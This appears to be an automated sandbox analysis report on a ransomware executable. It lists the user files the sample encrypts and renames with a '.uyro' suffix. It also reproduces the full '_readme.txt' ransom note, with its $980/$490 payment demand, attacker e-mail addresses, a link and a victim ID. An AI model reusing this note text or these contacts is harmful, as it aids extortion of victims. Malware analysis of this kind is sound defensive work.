Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico entropy: 7.99871963214	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\sv\OneDrive.adml entropy: 7.99524754113	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\tr\OneDrive.adml entropy: 7.99606012022	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-CN\OneDrive.adml entropy: 7.99481256171	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\zh-TW\OneDrive.adml entropy: 7.99425827432	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\acm_low_disk_space_online_only.svg entropy: 7.99630390885	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat entropy: 7.99055795118	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml entropy: 7.99471432634	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui entropy: 7.99881519691	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin entropy: 7.99442966622	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\finderExtensionPrompt.svg entropy: 7.99584080057	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui entropy: 7.9958653689	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui entropy: 7.99649881628	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui entropy: 7.99856775073	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt entropy: 7.99590032893	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui entropy: 7.99851888267	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui entropy: 7.99852776609	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui entropy: 7.99383215582	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db entropy: 7.99840183987	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db entropy: 7.99843170661	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db entropy: 7.99821329563	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db entropy: 7.99831618931	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99833774153	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GA0XG3F1\www.bing[1].xml entropy: 7.99875962587	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif entropy: 7.99721934119	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png entropy: 7.99094671707	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png entropy: 7.99396331293	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\kfm_folders_image.svg entropy: 7.99211560075	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\acm_low_disk_space_online_only.svg entropy: 7.99605241269	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\done_graphic.svg entropy: 7.99025058473	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\finderExtensionPrompt.svg entropy: 7.99526710076	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\folder_image_documents.svg entropy: 7.99192159907	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\0.0.filtertrie.intermediate.txt entropy: 7.99183641623	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.ft entropy: 7.99281406479	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c863731-2a35-4444-9405-4d7cbb267ab4}\Apps.index entropy: 7.99876519634	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\0.0.filtertrie.intermediate.txt entropy: 7.99103949604	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.ft entropy: 7.99273703708	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{536fe6e8-a600-46a1-adbb-191db00f5995}\Apps.index entropy: 7.99871144675	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui entropy: 7.99029743124	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\0.0.filtertrie.intermediate.txt entropy: 7.99014171777	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.ft entropy: 7.99262014283	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.index entropy: 7.99878279768	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui entropy: 7.99637167206	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\0.0.filtertrie.intermediate.txt entropy: 7.99026027718	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.ft entropy: 7.99442743123	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.index entropy: 7.9987430163	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsconversions.txt entropy: 7.99403941778	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appssynonyms.txt entropy: 7.99767606024	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui entropy: 7.99716449323	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsconversions.txt entropy: 7.99503561135	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsglobals.txt entropy: 7.9950159432	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingssynonyms.txt entropy: 7.9976174437	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\0.0.filtertrie.intermediate.txt entropy: 7.99843394049	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\Settings.ft entropy: 7.99874765159	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\0.0.filtertrie.intermediate.txt entropy: 7.998237632	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\Settings.ft entropy: 7.99856325981	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl entropy: 7.99297738514	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui entropy: 7.99838926231	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui entropy: 7.99869275521	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui entropy: 7.9956248886	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui entropy: 7.9982607823	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui entropy: 7.99796320318	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui entropy: 7.99830075129	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99725586109	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_113458_1850-1854.log entropy: 7.9978716096	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99745726518	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99779745496	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.9933042204	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99695428486	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99644028819	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99738642168	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99703999482	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1 entropy: 7.99501738601	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui entropy: 7.99013403458	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui entropy: 7.99588139821	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\chrome_installer.log entropy: 7.99237075024	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui entropy: 7.99015668004	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl entropy: 7.99566565374	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT entropy: 7.99615692743	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe entropy: 7.99873980315	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT entropy: 7.9960114755	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat entropy: 7.99833031083	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99807962222	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.9951655608	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\chrome_installer.log.uyro (copy) entropy: 7.99237075024	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Application Data\Microsoft\Office\MSO1033.acl.uyro (copy) entropy: 7.99566565374	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.uyro (copy) entropy: 7.99615692743	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy) entropy: 7.99873980315	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.uyro (copy) entropy: 7.9960114755	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.uyro (copy) entropy: 7.99833031083	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.uyro (copy) entropy: 7.99807962222	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.uyro (copy) entropy: 7.9951655608	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.uyro (copy) entropy: 7.99442966622	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt.uyro (copy) entropy: 7.99590032893	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.uyro (copy) entropy: 7.99840183987	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db.uyro (copy) entropy: 7.99843170661	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db.uyro (copy) entropy: 7.99821329563	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db.uyro (copy) entropy: 7.99831618931	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.uyro (copy) entropy: 7.99833774153	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.uyro (copy) entropy: 7.99297738514	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.uyro (copy) entropy: 7.99725586109	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.uyro (copy) entropy: 7.99745726518	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.uyro (copy) entropy: 7.99779745496	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.uyro (copy) entropy: 7.9933042204	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.uyro (copy) entropy: 7.99695428486	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.uyro (copy) entropy: 7.99644028819	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.uyro (copy) entropy: 7.99738642168	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.uyro (copy) entropy: 7.99703999482	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy) entropy: 7.99501738601	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy) entropy: 7.99013403458	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy) entropy: 7.99588139821	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy) entropy: 7.99015668004	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy) entropy: 7.99409784357	Jump to dropped file

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-5ucwrds3edprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@fishmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0609djfsieek6te1ygpnibo4gcgoep3ihx1cffhbueguxrgm3xs	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-5ucwrds3edprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@fishmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0609djfsieek6te1ygpnibo4gcgoep3ihx1cffhbueguxrgm3xs	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption;device devices;encode encodes;encryption encryptions;locker;protection;secure;tpm"}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemsupportinfo.settingcontent-ms"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagepcsysteminfo"},"system.setting.groupid":{"type":12,"value":"settingsgrouppcsystemsupportinfo"},"system.comment":{"type":12,"value":"get pc support 